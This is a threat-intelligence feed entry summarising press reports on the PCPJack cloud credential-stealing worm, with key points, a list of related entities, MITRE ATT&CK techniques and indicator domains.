Back

PCPJack Malware Targets TeamPCP Victims for Credential Theft

Severity: High (Score: 69.5)

Sources: Theregister, Itnews.Au, Techcrunch, Technadu, Darkreading

Summary

The newly discovered PCPJack malware framework is actively targeting cloud environments to steal credentials while removing remnants of the TeamPCP cybercrime group. This worm exploits exposed services such as Docker, Kubernetes, Redis, and MongoDB, propagating through compromised cloud infrastructures. SentinelLabs identified PCPJack on April 28, 2026, noting its capability to evict TeamPCP's tools and install its own credential theft modules. The malware is designed for large-scale credential theft and monetizes its operations through fraud, spam, and extortion, without deploying cryptocurrency mining functions. The attack vector involves a shell script named bootstrap.sh that establishes persistence and downloads additional modules for credential harvesting. Affected organizations are urged to implement robust cloud security practices to mitigate risks. The scope of impact includes various cloud, container, developer, and financial services, with significant implications for organizations relying on these platforms. Key Points: • PCPJack targets cloud services, stealing credentials while removing TeamPCP artifacts. • The malware exploits vulnerabilities in Docker, Kubernetes, Redis, and MongoDB. • Organizations are advised to enhance cloud security practices to defend against PCPJack.

Key Entities

  • TeamPCP (apt_group)
  • Data Breach (attack_type)
  • Malware (attack_type)
  • Phishing (attack_type)
  • Supply Chain Attack (attack_type)
  • Worm (attack_type)
  • CanisterWorm (malware)
  • Sliver (malware)
  • PCPCat Campaigns (campaign)
  • PCPJack (campaign)
  • PCPJack Campaign (campaign)
  • Anthropic (company)
  • Aqua Security (company)
  • DigitalOcean (company)
  • European Commission (company)
  • Mercor (company)
  • Discord (platform)
  • Bitcoin (platform)
  • Common Crawl (platform)
  • Digital Ocean (platform)
  • GitHub (platform)
  • LiteLLM (tool)
  • Docker (tool)
  • GitHub Actions (tool)
  • Gmail (tool)
  • Trivy (tool)
  • CWE-200 - Exposure of Sensitive Information (cwe)
  • cdn.cloudfront-js.com (domain)
  • spm-cdn-assets-dist-2026.s3.us-east-2.amazonaws.com (domain)
  • Financial (industry)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1027 - Obfuscated Files Or Information (mitre_attack)
  • T1041 - Exfiltration Over C2 Channel (mitre_attack)
  • T1053 - Scheduled Task/Job (mitre_attack)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed